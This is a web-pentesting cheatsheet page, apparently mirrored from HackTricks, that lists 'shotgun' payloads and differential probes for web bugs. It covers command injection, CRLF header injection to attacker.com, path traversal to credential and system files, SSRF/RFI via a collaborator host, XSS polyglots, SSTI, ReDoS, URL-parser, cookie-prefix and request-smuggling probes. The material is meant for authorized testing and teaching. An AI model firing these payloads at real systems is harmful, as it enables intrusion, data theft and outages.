daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

web-vulns-list.md (12466B)


      1 ---
      2 title: "Web Vulns List"
      3 section: "Web Pentesting"
      4 sectionSlug: "pentesting-web"
      5 sourcePath: "src/pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Web Vulns List
     14 
     15 Quick list of **shotgun payloads** and **differential probes** to throw at reflected input before pivoting into the dedicated page for each bug class.
     16 
     17 ## Quick shotgun payloads
     18 
     19 ```text
     20 {{7*7}}[7*7]
     21 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
     22 /*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
     23 %0d%0aLocation:%20http://attacker.com
     24 %3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
     25 %3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
     26 %0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
     27 <br><b><h1>THIS IS AN INJECTED TITLE</h1>
     28 /etc/passwd
     29 ../../../../../../etc/hosts
     30 ..\..\..\..\..\..\etc/hosts
     31 /etc/hostname
     32 /proc/self/environ
     33 C:/windows/system32/drivers/etc/hosts
     34 ../../../../../../windows/system32/drivers/etc/hosts
     35 ..\..\..\..\..\..\windows/system32/drivers/etc/hosts
     36 http://<collaborator>/mal.php
     37 \\<collaborator>\mal.php
     38 www.whitelisted.com
     39 www.whitelisted.com.evil.com
     40 https://google.com
     41 //google.com
     42 javascript:alert(1)
     43 (\\w*)+$
     44 ([a-zA-Z]+)*$
     45 ((a+)+)+$
     46 <!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
     47 {{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
     48 <xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
     49 " onclick=alert() a="
     50 '"><img src=x onerror=alert(1) />
     51 javascript:alert()
     52 javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
     53 -->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
     54 ">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/index.html) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src//README.md"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
     55 " onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
     56 ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
     57 ```
     58 
     59 ## Extra differential probes worth trying
     60 
     61 These are useful when the reflection looks boring but you suspect **parser differences**, **normalization**, or **cross-component decoding mismatches**.
     62 
     63 ### Error-based and blind SSTI / code-injection probes
     64 
     65 A rendered arithmetic probe can miss an injection when the result is not returned. The generic expression below is designed to reach runtime evaluation and deliberately raise an error across several common language and template contexts; compare it with a numeric baseline and do **not** count a syntax error alone as proof of SSTI. A reflected exception may also reveal the engine, while a stable error/non-error response difference can become a blind oracle.<sup>[[6]](#references)</sup>
     66 
     67 ```text
     68 1337
     69 (1/0).zxy.zxy
     70 ```
     71 
     72 After identifying the delimiters, confirm a blind error oracle with a minimally different true/false pair. For example, in a Jinja-like expression context:
     73 
     74 ```text
     75 {{ 1 / (1 == 1) }}
     76 {{ 1 / (1 == 2) }}
     77 ```
     78 
     79 - The first expression should render normally; the second should divide by zero. Compare status, body length, headers, final URL and response time over several alternating requests.
     80 - Repeat with a second independent pair and cache-busting value. This helps reject false positives caused by WAF signatures, unstable upstreams or cached error pages.
     81 - Once the engine is known, pivot to [SSTI (Server Side Template Injection)](/hacktricks/pentesting-web/ssti-server-side-template-injection/overview) rather than treating this canary as a universal exploit payload.
     82 
     83 ### Unicode / normalization probes
     84 
     85 If the app strips dangerous ASCII first and normalizes later, Unicode can turn into the dangerous character only after the filter.
     86 
     87 ```text
     88 %e2%84%aa
     89 %ef%bc%87
     90 %ef%bc%82
     91 ```
     92 
     93 - `%e2%84%aa` is the **Kelvin sign** (`K`) and is a great canary to detect normalization when the application reflects back a plain `K`.
     94 - `%ef%bc%87` / `%ef%bc%82` are fullwidth quote variants that can become `'` / `"` after NFKC/NFKD normalization.
     95 - If these mutate, continue in [Unicode Normalization](/hacktricks/pentesting-web/unicode-injection/unicode-normalization).
     96 
     97 ### URL parser discrepancy probes (Open Redirect / SSRF allowlists)
     98 
     99 Useful when a backend validates the URL with one parser but the browser, proxy, framework, or downstream client resolves it differently.<sup>[[3]](#references)</sup>
    100 
    101 ```text
    102 <allowed>[@<attacker>
    103 <allowed>:443\@<attacker>
    104 [::1]@[::1]@<attacker>
    105 <attacker>%09<allowed>
    106 <attacker>%0d%0a<allowed>
    107 <attacker>%E2%80%A8<allowed>
    108 <attacker>%E2%80%A9<allowed>
    109 ```
    110 
    111 - `[` in the userinfo segment has been particularly useful against Spring-based validation logic.
    112 - Tab / CRLF separators are still worth testing when allowlists or regexes are applied before a second parser consumes the URL.
    113 - `%E2%80%A8` / `%E2%80%A9` (Unicode line / paragraph separators) are useful when a validator applies a multiline regex such as `^allowed$` before a later parser consumes the hostname.
    114 - For a bigger list, continue in [URL Format Bypass](/hacktricks/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass).
    115 
    116 ### Cookie / prefix confusion probes
    117 
    118 When you control a subdomain, have XSS in a sibling subdomain, or can inject cookies indirectly, test parser differences between the browser and the backend.<sup>[[1]](#references)</sup>
    119 
    120 ```javascript
    121 document.cookie = `${String.fromCodePoint(0x2000)}__Host-name=injected; Domain=.example.com; Path=/;`;
    122 document.cookie = `$Version=1,__Host-name=injected; Path=/anything; Domain=.example.com;`;
    123 ```
    124 
    125 - Leading Unicode whitespace may bypass the browser prefix check but normalize to `__Host-name` server-side.
    126 - Legacy `$Version=1` parsing can make some Java stacks split a single cookie string into multiple logical cookies.
    127 - If you have response splitting, header injection, or a proxy that lets you shape a raw `Cookie:` header, also test spaces / tabs around `=` together with `$Version=1` because some legacy parsers will still recognize the injected pair even when brittle filters do not.
    128 - If either works, continue in [Cookies Hacking](/hacktricks/pentesting-web/hacking-with-cookies/overview).
    129 
    130 ### Desync / parser-differential canaries
    131 
    132 Use these to quickly check whether the front-end and back-end disagree on header parsing before moving to the full desync methodology.<sup>[[2]](#references)</sup>
    133 
    134 ```http
    135 Host : attacker.tld
    136 Content-Length:
    137  7
    138 
    139 GET /404 HTTP/1.1
    140 X: Y
    141 TRACE / HTTP/1.1
    142 X-Reflect: <script>alert(1)</script>
    143 ```
    144 
    145 - `Host :` vs `Host:` can expose hidden/visible parsing differences.
    146 - Multiline `Content-Length` is a classic `0.CL` canary.
    147 - If `TRACE` reaches the backend, it can become a reflection gadget during desync exploitation.
    148 - For the full workflow, continue in [HTTP Request Smuggling / HTTP Desync Attack](/hacktricks/pentesting-web/http-request-smuggling/overview).
    149 
    150 ### Client-side path traversal / JSON gadget probes
    151 
    152 Use these when user-controlled route params, uploaded metadata, or stored JSON blobs are later concatenated into `fetch()` / XHR paths.<sup>[[4]](#references)</sup>
    153 
    154 ```text
    155 ../../admin/users
    156 ..%2f..%2fadmin/users
    157 ..;/..;/admin/users
    158 ../../../v1/token.css
    159 {"aaa":"WEBP","_id":"../../../../CSPT?"}
    160 ```
    161 
    162 - Dot-segment variants are good canaries for **CSPT / OSRF** when the frontend builds same-origin API paths and automatically reuses cookies or auth headers.
    163 - `../../../v1/token.css` is a quick probe for **CSPT ➜ cache deception** chains where a CDN caches static-looking suffixes but the origin still returns authenticated JSON.
    164 - The JSON snippet is a practical **JSON/WEBP polyglot-style gadget**: useful when a frontend later calls `JSON.parse()` on uploaded content but the upload path performs naive `image/webp` magic-byte validation.
    165 - For the full exploitation workflow, continue in [Client Side Path Traversal](/hacktricks/pentesting-web/client-side-path-traversal) and [Cache Poisoning and Cache Deception](/hacktricks/pentesting-web/cache-deception/overview).
    166 
    167 ### Content-Type / body-parser differential canaries
    168 
    169 A WAF, gateway and framework may select different body parsers or recover differently from malformed input. Start with a harmless marker and replay the same logical field as `application/x-www-form-urlencoded`, JSON and multipart; acceptance of an unexpected encoding expands the parser-differential attack surface. Recent differential fuzzing found exploitable disagreements in JSON, XML and multipart handling across major WAF/framework combinations.<sup>[[7]](#references)</sup>
    170 
    171 A raw NUL adjacent to a JSON member name is a compact parse-error/fail-open canary (send byte `00`, not the four printable characters `\x00`):
    172 
    173 ```http
    174 Content-Type: application/json
    175 
    176 {"probe"\x00:"CANARY"}
    177 ```
    178 
    179 For multipart, test duplicate/ambiguous boundary parameters while keeping the body benign:
    180 
    181 ```http
    182 Content-Type: multipart/form-data; boundary="x",boundary=y
    183 
    184 --y
    185 Content-Disposition: form-data; name="probe"
    186 
    187 CANARY
    188 --y--
    189 ```
    190 
    191 - Compare the response with a valid baseline and verify server-side state or an echo endpoint; `200 OK` alone does not prove the backend extracted the field.
    192 - Also try omitting `Content-Type`, changing a form-urlencoded request to multipart, RFC 2231 continuations such as `boundary*0=` / `boundary*1=`, and harmless preamble/epilogue bytes. Preserve exact bytes in a raw request editor.
    193 - If the edge blocks the baseline attack marker but forwards the malformed version and the origin still extracts the marker, continue in [Proxy / WAF Protections Bypass](/hacktricks/pentesting-web/proxy-waf-protections-bypass). Test only authorized systems because parser errors can trigger availability problems.
    194 
    195 ### Modern XSS-only probes
    196 
    197 ```html
    198 <svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg'><image href='https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/pentesting-web/pocs-and-polygloths-cheatsheet/1' onerror='alert(1)' /></svg>#x" />
    199 ```
    200 
    201 This browser-dependent probe is handy when classic `img/onerror` payloads fail but SVG elements or `data:` URLs survive filtering. Run it in an isolated test profile and confirm support in the target browser before treating a filtered reflection as exploitable.<sup>[[5]](#references)</sup>
    202 
    203 
    204 ## References
    205 
    206 - [1] [Cookie Chaos: How to bypass Host and Secure cookie prefixes - PortSwigger Research](https://portswigger.net/research/cookie-chaos-how-to-bypass-host-and-secure-cookie-prefixes)
    207 - [2] [HTTP/1 must die - PortSwigger Research](https://portswigger.net/research/http1-must-die)
    208 - [3] [Introducing the URL Validation Bypass Cheat Sheet - PortSwigger Research](https://portswigger.net/research/introducing-the-url-validation-bypass-cheat-sheet)
    209 - [4] [CSPT via file upload - Doyensec](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)
    210 - [5] [PortSwigger - Cross-site scripting cheat sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
    211 - [6] [Successful Errors: New Code Injection and SSTI Techniques](https://github.com/vladko312/Research_Successful_Errors)
    212 - [7] [WAFFLED: When the Firewall and the Server Disagree](https://akhavani.net/blog/waffled/)